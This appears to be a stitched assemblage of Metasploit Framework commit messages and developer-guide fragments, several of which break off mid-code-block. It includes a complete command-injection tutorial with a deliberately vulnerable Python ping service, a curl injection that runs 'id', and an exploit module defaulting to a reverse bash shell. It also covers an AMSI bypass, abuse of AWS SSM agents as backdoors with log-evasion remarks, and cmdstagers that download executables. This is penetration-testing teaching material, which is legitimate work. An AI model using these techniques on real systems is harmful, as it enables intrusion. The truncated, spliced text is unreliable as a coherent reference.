This PR adds a variety of improvements to the
enum_computers module, including shell and PowerShell
support, as well as improvements to run on non-English
systems.
This PR adds a module that exploits a series of vulns
which leads to RCE on affected TorchServe targets. It
also includes updates to the class_loader library.
The URIPATH must end with / due to how the package names are requested
from the web server in a nested directory structure. #on_request_uri
also needed to be updated to check for the relative resource.
This PR updates the metasploit-framework side of the
metasploit-payloads fix #672. This PR also includes
metasploit-framework PR #18445 which bumps the
metasploit-payloads gem version to 2.0.156.
Kibana before version 7.6.3 suffers from a prototype
pollution bug within the Upgrade Assistant. This PR adds
an exploit module to exploit the bug. There is no CVE
for this issue at the moment.
Change strings to reference `VMware` using the proper case. Don't
include CmdStager (because it's unnecessary). Set PrependFork to fix
shell payloads. Move CamelCase options to advanced.
* Reduce verbosity of log messages
* Move 'check_*' methods into 'check' method
* Fix non-existent Windows PowerShell Command payload
* Clearer log message for unpausing DAG in 'check_unpaused' method
This PR fixes a stack trace thrown by the forge_ticket
module when the SPN datastore option was left blank. The module
now fails with a bad-config error and gives a detailed error message.
This PR adds a module for an unauthenticated RCE vulnerability
in Maltrail, a malicious traffic detection system. This vuln
does not have a CVE associated with it.
This PR adds support for detecting whether a session is
running in a podman container and improves detection for
sessions running in Docker, LXC and WSL containers.
The connection needs to slowly send data to the remote end for
stability. Additionally, the `exit` command should be issued when
closing the connection so it is reset back to the logon prompt.
Windows shells require an extra configuration step, and even when that is
present the result is not the cmd.exe or powershell session that MSF expects
but rather a SAC shell.
AWS EC2 Nitro instances (and possibly others) support serial proxy
over SSH using the Instance Connect API:
https://docs.amazonaws.cn/en_us/AWSEC2/latest/UserGuide/connect-to-serial-console.html
This process consists of sending an SSH pubkey to the serial proxy
control plane, connecting to a well-known URL with the instance ID
and port number as username, and the SSH private key as credential.
The resulting session is a "fragile" SSH context which does not
tolerate Channel-closing, requiring some special handling in Msf to
safeguard the initial Net::SSH::CommandStream.
Implement a BindAwsInstanceConnect Handler which loads an SSH key
from the local FS or generates a new one on the fly, passes the
pubkey to the InstanceConnect API, and then establishes SSH comms
with the InstanceConnect SSH proxy.
Implement an AwsInstanceConnectBind to handle resulting connections,
derived from SshCommandShellBind, with an updated #bootstrap which
avoids meddling with the fragile CommandStream/Channel.
Testing:
Got serial console to the ttyS0 login prompt of a Nitro EC2 VM.
Logged in using previously-known credentials.
Verified console operations.
Notes:
Handler keeps firing, same as the SSM session concern.
There is a limit to the number of sessions which an instance can
hold (possibly only one).
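A minimal Ruby sketch of the flow described above; the instance ID and endpoint hostname are illustrative assumptions, and the step that pushes the public key via the InstanceConnect API is omitted:

```ruby
require 'openssl'

# Generate an ephemeral key on the fly; the handler may instead load one
# from the local filesystem.
key = OpenSSL::PKey::RSA.new(2048)

# The serial proxy expects "<instance-id>.port<N>" as the SSH username and
# the matching private key as the credential. Values below are examples.
instance_id = 'i-0123456789abcdef0'
serial_port = 0
ssh_user    = "#{instance_id}.port#{serial_port}"
endpoint    = 'serial-console.ec2-instance-connect.us-east-1.aws'
target      = "#{ssh_user}@#{endpoint}"
```

The public key would be sent to the serial proxy control plane first, after which an SSH connection to `target` authenticated with the private key yields the serial console.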
This updates the aarch64 payloads to include comments with the
corresponding instructions for each little-endian integer. It also fixes
the debug output for x64 payloads under Rosetta.
This module exploits a vulnerability in pfSense version
2.6.0 and below which allows for authenticated users to
execute arbitrary operating system commands as root.
* Msftidy complains about Line 2 of the exploit template comment having
the http:// protocol instead of the https:// protocol
* Reference: in PR #18170, the Msftidy lint test fails at commit
ad0d3e79, but passes at the next commit, 591fee18.
* Small fixes in Description - removed backticks
* Implemented Windows Command target
* Removed PowerShell Stager, in Targets and in exploit method
* Implemented Rex::Socket::Tcp in place of TCPSocket
* Updated TARGET section in documentation
* Added TARGET 0 - Windows Command scenario
* Removed PowerShell Stager scenario
* Replaced 'Using configured payload' lines to use Windows Command payload
for the 2nd, 3rd, and 4th scenarios. Did not rerun the scenarios, however
The _AppDomainPtr, _AssemblyPtr and _MethodInfoPtr variables are COM smart pointers which will auto-Release() when they go out of scope, so we should not directly Release() them.
This reverts commit f97ab80224, reversing
changes made to c8f942cc03.
This change impacted the default `psexec` powershell target and needs further
testing to be reintroduced.
This adds support for the dyld changes incorporated into Sonoma and
cleans up the existing support for Ventura. This does not break
compatibility with previous versions.
This adds support for the dyld changes incorporated into Ventura which
includes changes to the symbols used. This does not break compatibility
with previous versions.
This commit adds the sign method to Payload::MachO which performs a
basic SHA256 signature update on the provided macho to enable it to run
under osx aarch64 systems.
This builds on Back from the dyld by adding the required aarch64
assembly code to enable the OSX loader to run on the m1. This enables
the use of native payloads on M1 or M2 devices that do not have Rosetta
installed.
When the entry point is after the payload, there would occasionally be
cases where `poff` and `eidx` were invalid, causing `entry` to be
truncated. `poff` should never be negative and `eidx` should reserve the
256 bytes that `entry` may occupy.
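A small Ruby sketch of the bounds logic described above; the variable names follow the message, but the concrete sizes and offsets are assumptions:

```ruby
ENTRY_RESERVED = 256 # bytes `entry` may occupy at the end of the blob
payload_len = 4096

poff = -8                 # a computed payload offset that could go negative
eidx = payload_len - 100  # an entry index leaving fewer than 256 bytes

# The fix: poff must never be negative, and eidx must reserve the space
# that entry may occupy, so entry is not truncated.
poff = 0 if poff.negative?
max_eidx = payload_len - ENTRY_RESERVED
eidx = max_eidx if eidx > max_eidx
```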
The script generated by the web_delivery module is blocked
by the Antimalware Scan Interface (AMSI) on newer versions
of Windows. This PR allows the script to bypass AMSI.
Get all instances if limit is not set, improve output slightly.
Note: `inst.network_interfaces.select {|iface| iface.association}`
appears to have problems with multiple calls at run time - says
that the AWS SDK is trying to call `:[]` on `nil` but works in Pry.
Move debugging info into same file and make markdown match standards
Add more info on Pry debugging using Alan David Foster's explanation
Fix up broken URL links and format new URL links correctly
Fix up formatting and add information on Debug.gem supported commands
* Move modules that landed as scanners into a more appropriate category.
* Adds a check method based on TP-link default `TITLE` html.
* Rename module consistent with existing exploit.
Previously there was no way to restore the server proxy setting.
This updates the code to do so. Additionally this also updates the documentation
to note that Fetch payloads are incompatible with this module since they
use HTTP connections that will be impacted by this module changing the server's
HTTP proxy settings. There is no way around this.
The size requirement is used when the adapted payload is executed from
the command line but that's not the case for the fetch payloads which
execute a command to fetch the payload from a URL. The payload size
doesn't matter because it's included in the executable file hosted at
the URL.
* Prevent using post modules with the session
It doesn't work reliably because of winpty and how the output is
mangled.
* Set the limit correctly
* Fix Linux PTY downgrade issues
* Remove filtering
The filtering implementation is incomplete and unnecessary.
Filtering is unnecessary because Linux sessions execute a stub on
session start up that uses a combination of stty and a fifo to emulate a
PTY-less session. Windows sessions do not need filtering because they
have been explicitly marked as being incompatible with the Post API, which
is confused by the extra characters.
The filtering implementation is incomplete because it does not account for
echo fragments that are split across lines. It also does not account for
all of the ANSI escape codes.
* Add module docs for enum_ssm
The function required a filter argument, but not every query has a
filter. By removing it, we can reuse the same logic for other operations
including modifications.
* Revert "shell_command_token_base get 0th output index"
This reverts commit 3a4cb3560f.
* Correct the order of arguments to #set_term_size
* Fix paths for directory checks
The path C:\ ends with a trailing backslash which will cause bash to
wait for another line of input. This places the shell in an undesirable
state.
* Fix post module tests for Linux
* Remove the command document
This hasn't been tested and it's unclear under what conditions this
would be used.
* Fix Windows SSM sessions
---------
Co-authored-by: Spencer McIntyre <zeroSteiner@gmail.com>
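The filter-argument removal described above could be sketched like this; the names here are illustrative, not the real API:

```ruby
# Before: every caller had to supply a filter. After: the filter is
# optional, so the same helper serves plain reads, filtered reads, and
# can be reused for modification queries as well.
def run_query(rows, filter: nil)
  return rows unless filter
  rows.select { |row| filter.call(row) }
end

run_query([1, 2, 3])                          # => [1, 2, 3]
run_query([1, 2, 3], filter: ->(r) { r > 1 }) # => [2, 3]
```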
- Put all the error-disabling statements on a single line
- Remove some useless spaces
- Use `stristr(…)` (available since PHP4) instead of `strpos(strtolower(…))`
- Use `&&` instead of `and`
- Use backticks instead of `passthru`, since they're equivalent: https://www.php.net/manual/en/language.operators.execution.php
* Improve base login scanner to catch any Exception
* Catch any Exception in SNMP scanner that overrides base method
* Expand connection errors possible in PostgreSQL scanner
Update the enum_ssm module to use the correct session type with the
appropriate platform. Also set the session information to the same
string which also removes the eyesore that is the shell banner.
Fixed some typos, took into account the comment from jvoisin to infer fields from the JSON reply, used fail_with as suggested by jheysel-r7, fixed a rubocop warning about a redundant begin block.
Create an AwsSsmCommandShellBind session type to provide intercept
points for shell command interactions and a wrapper class which is
used to register the new session.
Update Msf::Handler::BindAwsSsm with its own #create_session method
utilizing the new session type to provide direct control of session
initialization.
Restore standard handler attributes and thread nomenclature in an
attempt to resolve the repeating session creation when #to_handler
is called on the payloads.
Testing:
Tested in local framework, unfortunately the recurring session
init problem appears to persist. Requesting testing on an upstream
Framework by saner folks.
Update SSM handler code to standardize datastore option names per
@zeroSteiner.
Update payload modules to reflect the OS targets against which they
are to execute.
Bail out of console resize operation if ::IO.console doesn't exist
Enforce REGION datastore option and remove the multi-region enum
code by Aaron - users can write resource scripts if they need
automation.
Expand SSM enumeration module docs to explain full functionality.
Enable the LIMIT configuration option to restrict results per
region.
Implement FILTER_EC2_ID configuration option to permit targeting
of a specific instance for session initiation.
Testing:
Finds limited sets of systems and initiates sessions
Finds desired system ID and initiates session
The SSM session socket times out without data being sent at the
upper (SSM) WS layer. Implement keep-alive in a separate thread
which simply writes nothing into the channel at irregular intervals
to simulate user activity.
Testing:
Sessions established with this code running have not timed-out
in over 15m despite being completely unused
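A sketch of the keep-alive approach described above, assuming a channel object with a #write method; the interval bounds are illustrative:

```ruby
# Spawn a background thread that writes an empty string into the channel
# at irregular intervals, simulating user activity so the upper (SSM)
# WebSocket layer does not time the session out.
def start_keepalive(channel, min_delay: 5.0, max_delay: 25.0)
  Thread.new do
    loop do
      sleep(rand(min_delay..max_delay))
      channel.write('')
    end
  end
end
```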
Enable session acquisition from AWS SSM enumeration module similar
to how the telnet login scanner acquires sessions on the sockets
exposed.
Testing:
Tested execution - finds systems, gets shells, autopwn-capable
Co-opt Aaron Soto's EC2 enum module & replace the guts with an SSM
query for not-terminated EC2 instances with SSM capability. This
will provide users with the instance IDs needed to test their SSM
shells and can be expanded to report information or even act as a
"brute-force" module which automatically starts SSM sessions.
Testing:
None - might eat your monitor lizard
Implement terminal resizing to WebSocket shell
Reorganize code to ease later extension
Implement peerinfo in channel context from AWS EC2 SSM information
gathered during session validation
Implement echo-filtering for session inputs (hacky, but works)
Testing:
Verified console resizing, color/reset/etc
Verified peerinfo and interaction
Verified common session operations
Notes:
SSM WebSocket sessions time out pretty quickly, implementing
dedicated SSM session types which support suspend/resume to match
backgrounding/foregrounding operations in the console should help
to resolve this. Alternatively, a keep-alive using empty frames
may be implemented in the SsmChannel itself on a separate thread.
Alter WebSocket::Interface::Channel to accept a mask_write flag to
set the Channel behavior for outgoing data (since the on_data_write
handler can only deal with the buffer provided, not how the wsframe
containing it is written to the "wire"). Set the flag to false for
SSM's WebSocket operations.
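For context, RFC 6455 requires client-to-server WebSocket frames to be masked with a 4-byte XOR key; the mask_write flag toggles whether that masking is applied to outgoing data. A minimal sketch of the masking operation itself:

```ruby
# XOR each payload byte with the corresponding byte of the 4-byte mask key.
# Applying the mask twice with the same key restores the original data.
def mask_payload(data, key)
  data.bytes.each_with_index.map { |b, i| b ^ key[i % 4] }.pack('C*')
end

key    = [0x12, 0x34, 0x56, 0x78]
masked = mask_payload('ping', key)
mask_payload(masked, key) # round-trips back to "ping"
```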
Extract Rex::Proto::Http::WebSocket::AmazonSsm from the handler to
permit reuse by other framework elements.
Implement SSM-specific UUID handling.
Create sane SsmFrame constructor to permit convenient operations.
Implement Http::WebSocket::AmazonSsm::Interface::SsmChannel from
Http::WebSocket::Interface::Channel with message-type handling and
output processing. Acknowledge incoming messages, process incoming
acknowledgements, increment sequence IDs appropriately, and handle
basic logging.
This new session type removes the 2500 char output restriction and
stateless peer cwd.
Testing:
Execution of handler now provides stateful interactive shells
Next steps:
More testing, preferably by other people with upstream framework.
Peerinfo and presentation updates for the session channel
Misc cleanup
Future work:
Implement new SSM session type with support for multi-console,
port-forwarding/socket routing, and custom SSM documents.
Implement FSM handlers for session suspension and resumption in
Http::WebSocket::AmazonSsm::Interface::SsmChannel
Create BinData structure to handle the proprietary format of AWS'
SSM WebSocket protocol. Implement relevant inter-field dependencies
and a virtual payload_valid field to handle the SHA256 digest check
for the current state of the payload_data field.
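The digest check behind the virtual payload_valid field could be sketched as follows; the method name and shape are assumptions:

```ruby
require 'digest'

# The frame carries a SHA-256 digest of payload_data; the virtual field
# reports whether the digest matches the current payload contents.
def payload_valid?(payload_data, payload_digest)
  Digest::SHA256.digest(payload_data) == payload_digest
end

good_digest = Digest::SHA256.digest('data')
payload_valid?('data', good_digest)     # => true
payload_valid?('tampered', good_digest) # => false
```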
Implement user-accessible SSM document definition to permit use of
custom-defined command and session documents (stubbing for session
types such as port-forwarding) which may be of use when dealing
with restrictive IAM.
Restructure handler in preparation for moving the WebSocket code
into Rex::Proto for use by other consumers such as custom payloads
and session types like fully interactive (vs REPL) modalities, or
some form of "cloud-native" MeterSSM.
Testing:
Verified acquisition of SSM WS frame and relevant field ops
Next Steps:
Create WS loop to abstract shell communications
Wrap in Rex*Abstraction bowties for the session handler
Test -> ? -> Profit
Using the implementation in https://github.com/humanmade/ssm, use
the onconnect websocket authenticator as a JSON string written as
a wstext Frame into the established WebSocket. This keeps the sock
open with AWS after returning it from the method, but subsequent
operations will require definition and encoding/decoding of SSM's
proprietary data structures.
Testing:
The initialized WebSocket is kept open and returns wsframes when
requested.
Next steps:
Port the various data structures from the JavaScript library
Implement encoding & decoding for their wire-level formats
Implement state management and data flow handling logic for
the WS SSM protocol.
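Based on the humanmade/ssm implementation referenced above, the on-connect authenticator might look roughly like this; the field names and values are assumptions for illustration:

```ruby
require 'json'

# The authenticator is a JSON string written into the fresh WebSocket as
# a wstext frame; once accepted, it keeps the socket open with AWS.
token_message = {
  'MessageSchemaVersion' => '1.0',
  'RequestId'            => '00000000-0000-0000-0000-000000000000',
  'TokenValue'           => 'token-returned-by-start_session'
}.to_json
# ws.put_wstext(token_message)  # method name assumed for illustration
```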
Port WebSocket initiation routine from Exploit::Remote::HttpClient.
Currently inert since it appears to require a handshake procedure
along with its own type of data frame.
Implement graceful fail-down for session establishment which tries
to initiate a WebSocket session for proper functionality, failing
down to the script-execution style session abstraction if the WS
session does not marshal properly. Use this exception handling to
deal with the WIP WS session state.
Testing:
Gets the same kind of command-abstracted session as before
Interface-extended socket returns garbage from naive #write and
nothing from put_string or put_binary - not going to get anything
out of this thing until we establish the handshake procedure.
Next steps:
Figure out data frame structures for handshake and console IO
Implement handshake on-init, validate state
Implement IO abstraction for the resulting Channel for handoff
to #handle_connection
Amazon Web Services provides conveniently privileged backdoors in
the form of their SSM agents which do not require connectivity with
the target instance, merely valid credentials to AWS' API. Due to
this indirect "connection" paradigm, this mechanism can be used to
control otherwise "air-gapped" targets.
This approach abstracts asynchronous request/response parsing for
SSM requests into an IO channel with which the AWS SSM client is
then wrapped to emulate the expected Stream. The mechanism is rather
raw and could use better error handling, retries on laggy output,
and a threadsafe cursor implementation. It may be possible to start
an actually interactive session using the #start_session method in
the AWS client library, but so far testing has not yielded positive
results.
There is a significant limitation with these sessions not present
in normal stream-wise abstractions: a response limit of 2500 chars.
This limitation can be overcome by utilizing an S3 bucket to store
command output; however, due to the nature of access we seek to
obtain, it would not only add to the logged event loads but retain
the results of our TTPs in a "buffer" accessible to other people.
This functionality can be added down the line in the form of S3
config options in the handler to be passed into the SSM client for
command execution and acquisition of output.
Testing:
Gets sessions, provides command IO, leaves a bunch of log entries
in CloudTrail (something to keep in mind for opsec considerations).
Next steps:
Reorganize our WebSocket code a bit to provide connection and WS
state management inside Rex::Proto::Http::Client which can then be
exposed to the Handler without having to mix-in other namespaces
from Exploit.
Use the #start_session SSM Client method to extract the WS URL
for the relevant channel, and utilize that as the underpinning for
our session comms.
### Shared build tasks
Because all routine module-oriented tasks will be performed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:
```
rake run -- Start module, hook up stdin/stdout to JSON-RPC
### For classic modules
The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
2. Modify your `.git/config` file to enable signing commits and merges by default:
```ini
[user]
name=Your Name
email = your_email@example.com
[alias]
c=commit -S --edit
m = merge -S --no-ff --edit
```
Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash and therefore un-sign the commit; to re-sign the most recent commit, use `git c --amend`.
Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you're not familiar with them.
If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/view/Nick_Registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
Enable faster implementation of SQL injection based exploit modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.
Many testing techniques interacting with web servers, such as `XSS`, rely on keeping authentication obtained on a target active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authentication tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
When performing a security assessment on a network with centralized login such as LDAP or Active Directory, these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services once a user has gained code execution inside a target system, by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network-based capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory, providing capabilities similar to the existing `requests` plugin, could enable users to search for valuable information in these services without the need to compromise a target or interact with a secondary service.
Metasploit plugins can change the behavior of Metasploit framework by adding new features, new user interface commands, and more.
They are designed to have a very loose definition in order to make them as useful as possible.
Plugins are not available by default, they need to be loaded:
```msf
msf6 > load plugin_name
```
Plugins can be automatically loaded and configured on msfconsole's start up by configuring a custom `~/.msf4/msfconsole.rc` file:
```
load plugin_name
plugin_name_command --option
```
## Available Plugins
The current available plugins for Metasploit can be found by running the `load -l` command, or viewing Metasploit's [plugins](https://github.com/rapid7/metasploit-framework/tree/master/plugins) directory:
The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.
### `cookie` option
Shown below is the request used to login to a gitlab account in the [artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.
There are five main logging methods you will most likely be using a lot, and they all have the exact same arguments. Let's use one of the logging methods to explain what these arguments are about:
The first thing you need to do with ObfuscateJS is initialize it with the JavaScript you want to obfuscate, so in this case, begin like the following:
```ruby
js = %Q|
var arrr = new Array();
arrr[0] = window.document.createElement("img");
In some cases, you might actually want to know the obfuscated version of a symbol name. One scenario is calling a JavaScript function from an element's event handler, such as this:
```html
<html>
<head>
<script>
And here's the output:
```javascript
window[(function () { var _d="t",y="ler",N="a"; return N+y+_d })()]((function () { var f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })());
Here is an example targets section from a command injection module:
```ruby
'Targets' => [
[
'Unix Command',
# Flavors
Now that we know how to use the `Msf::Exploit::CmdStager` mixin, let's take a look at the command
stagers you can use. As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them in the commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to write a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit. It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.
* **TCP::max_send_size** - Evasive option. Maximum TCP segment size.
* **TCP::send_delay** - Evasive option. Delays inserted before every send.
If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"
Of course, when you write a Metasploit browser exploit, there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixins provide all kinds of methods to allow you to accomplish all of this. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or check out existing code examples (especially the recent ones).
To get things started, you can always use the following template to start developing your browser exploit:
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
If you've found a way to execute a command on a target, and you'd like to make a simple exploit module to get a shell, this guide is for you. Alternatively, if you have access to **fetch** commands on the target (curl, wget, ftp, tftp, tnftp, or certutil), you can use a [[Fetch Payload|How-to-use-fetch-payloads]] for a no-code solution.
By the end of this guide you'll understand how to turn [Command injection](https://owasp.org/www-community/attacks/Command_Injection) into a shell - from here, you can move on to the [[command stager|How-to-use-command-stagers]] article and upgrade your basic `:unix_cmd` Target to a Dropper for all kinds of payloads with variable command stagers.
This guide assumes *some* knowledge of programming (understanding what a class is and what methods/functions are) but expects no in-depth knowledge of Metasploit internals.
## A Vulnerable Service
For the vulnerable service test case, we'll be using a simple FastAPI service. This is very easy to spin up:
1. Install `fastapi[all]` using your preferred Python package manager (a virtual environment is recommended)
2. Create a file to hold some Python code (I'll call it `main.py`)
3. Copy the following code into your file:
```python
from fastapi import FastAPI, Response
import subprocess

app = FastAPI()


@app.get("/ping")
def ping(ip: str):
    # Vulnerable: user input is interpolated straight into a shell command
    res = subprocess.run(f"ping -c 1 {ip}", shell=True, capture_output=True)
    return Response(content=res.stdout)
```
4. Start your vulnerable service with `uvicorn main:app`
5. Test that the application works with `curl`:
```sh
$ curl http://localhost:8000/ping?ip=1.1.1.1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.7 ms
--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 16.739/16.739/16.739/0.000 ms
```
6. Test that your application is exploitable - also with `curl`:
```sh
$ curl localhost:8000/ping?ip=1.1.1.1%20%26%26id
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.6 ms
--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 16.614/16.614/16.614/0.000 ms
uid=1000(meta) gid=1000(meta)
```
With this output `uid=1000(meta) gid=1000(meta)`, we know that the `id` command successfully executed on the target system. Now that we have a vulnerable application we can write a module to pwn it.
## The Structure of a Module
To have a functioning command injection Metasploit module we **need** a few things:
1. Create a subclass of `Msf::Exploit::Remote`
2. Include the `Msf::Exploit::Remote::HttpClient` mixin
3. Define three methods:
- `initialize`, which defines metadata for the Module
- `execute_command`, which is what runs the command against the remote server
- `exploit`, which wraps `execute_command` and can handle extra logic when we move to a cmdstager module
4. (Not required, but recommended) a method to substitute or escape bad characters, to be used inside `execute_command`. This could also just be done inside `execute_command` instead of a separate function call.
### Where to put a Module
Metasploit looks for custom modules at `$HOME/.msf4/modules`, but the way you get modules there varies based on how you're running Metasploit.
- If you have a full install of Metasploit on your host, you can just add your custom module to `$HOME/.msf4/modules/exploits/custom_mod.rb`.
- You can also just add a module to Metasploit's modules folder - this can be helpful when troubleshooting, but it's not recommended
- **Docker** If you're using the [Docker Image](https://github.com/rapid7/metasploit-framework/tree/master/docker), you can also add modules to `$HOME/.msf4/modules` and that folder will be mounted as a volume inside the Docker container
- You can also change the mount point by modifying the [docker-compose](https://github.com/rapid7/metasploit-framework/blob/master/docker-compose.yml) file
For testing, the easiest approach is the simplest: find Metasploit's **exploits** directory, copy an existing module, rename it, and go from there.
## A Shell of a Module
The shell of a module that follows the above format is something like this:
```ruby
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    # empty for now
  end

  def filter_bad_chars(cmd)
    # empty for now
  end

  def execute_command(cmd, _opts = {})
    # empty for now
  end

  def exploit
    # empty for now
  end
end
```
This covers every essential point from [The Structure of a Module](#the-structure-of-a-module), although it won't run yet.
## Initialize
The `initialize` method is used to define and pass metadata. Every `initialize` method in the metasploit-framework codebase follows the format of an `info` hash being passed into `update_info`, which in turn is passed to the `Msf::Exploit::Remote` `initialize` method:
```ruby
def initialize(info = {})
  super(
    update_info(
      info,
      # Here is where the metadata goes
      'Name' => 'Command Injection against a test Ping endpoint',
      'Description' => 'This exploits a command injection vulnerability against a test application',
      'License' => MSF_LICENSE,
      'Author' => 'YOUR NAME',
      'References' => [
        ['URL', 'https://metasploit.com/']
      ],
      'DisclosureDate' => '2023-08-04',
      'Platform' => 'linux', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp
      'Targets' => [
        [
          'Unix Command',
          {
            'Platform' => ['linux', 'unix'], # linux and unix have different cmd payloads, this gives you more options
            'Arch' => ARCH_CMD,
            'Type' => :unix_cmd, # Running a command - this would be `:linux_dropper` for a cmdstager dropper
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_bash',
              'RPORT' => 8000
            }
          }
        ]
      ],
      'Payload' => {
        'BadChars' => "\x00"
      },
      'Notes' => { # Required for new modules https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS]
      }
      # Some more metadata options are here: https://docs.metasploit.com/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module
    )
  )
end
```
All that this method does is register metadata to the module.
## Filtering
It's important to ensure that payloads being sent are properly encoded. As an example, if you send a request to the `/ping` endpoint that looks like `/ping?ip=1.1.1.1&&id`, you won't see the "uid=1000(meta) gid=1000(meta)" in the response because `&` is a special character in HTTP.
Encoding requirements might change based on the application you're trying to inject, so experiment if things aren't working.
```ruby
def filter_bad_chars(cmd)
  return cmd
    .gsub(/&/, '%26')
    .gsub(/ /, '%20')
end
```
`filter_bad_chars` takes in `cmd`, which is a string. `cmd` has two substitutions applied - the first will translate `&` to `%26`, the second translates a space to `%20`. The `.gsub` statements are a global substitution across the string, so the entire payload is impacted by the substitutions here (Similar to str.replace in Python). Regardless of whether or not the string is modified, it is returned.
## Execution
The `execute_command` method takes in `cmd` and `_opts` and executes the command on the target. In our case, executing a command is simply adding the command to a GET request and sending it to the `/ping` endpoint on our sample service.
We don't even need to handle the output of `send_request_cgi` (Really, there should be no return until the shell exits, since the call to `subprocess.run` doesn't return until that shell dies).
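In module form, `execute_command` hands the finished URI to `send_request_cgi`. Since Metasploit code can't run outside the framework, the standalone sketch below only demonstrates how the injected request path is assembled; `injection_uri` is a hypothetical helper name used here for illustration, not framework API:

```ruby
# Standalone sketch of how execute_command builds the injected GET path.
# filter_bad_chars is the helper from the Filtering section above;
# injection_uri is a hypothetical name for illustration only.
def filter_bad_chars(cmd)
  cmd
    .gsub(/&/, '%26')
    .gsub(/ /, '%20')
end

def injection_uri(cmd)
  # Give ping a harmless target, then chain our command with '&&'
  "/ping?ip=1.1.1.1#{filter_bad_chars(" && #{cmd}")}"
end

puts injection_uri('id')
# => /ping?ip=1.1.1.1%20%26%26%20id
```

Inside the real module, `execute_command` would issue that URI with `send_request_cgi` and, as noted above, can ignore the response.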
## Exploitation
To finish up, all we need is to define the `exploit` method. This method is called by Metasploit when you use `run` within a msfconsole. All that we'll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well:
```ruby
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
execute_command(payload.encoded)
end
```
If you're running Metasploit and the vulnerable Python service on the same machine, you should be able to simply set the variables and fire:
```sh
set RHOST 127.0.0.1
set LHOST 127.0.0.1
run
```
## Conclusion
That's it. Put it all together and you have a very simple Command Injection exploit module that shows you the basics of how to throw a payload. Play around with different payloads, follow the [[How-to-use-command-stagers]] guide, add some logging to the Python web server, and watch executions over Wireshark. You'll learn a lot.
So, open up `metasploit-framework/.git/config` with your favorite editor, add an upstream remote, and add the pull request refs for both your and Rapid7's forks. In the end, you should have a section that started off like this:
Some people like to copy these over into remotes named "rapid7" and "yourusername" just so they don't have to remember about "origin" and "upstream," but for this doc, we'll just assume you have "origin" and "upstream" defined like this.
Now, you can git fetch the remote PRs. This will take a little bit, since we have a couple dozen MBs of pull request data. Storage is cheap, though, right?
```
$ git fetch --all
Fetching todb-r7
remote: Counting objects: 13, done.
```
You can `git fetch` a remote any time, and you'll get access to the latest changes to all branches and pull requests.
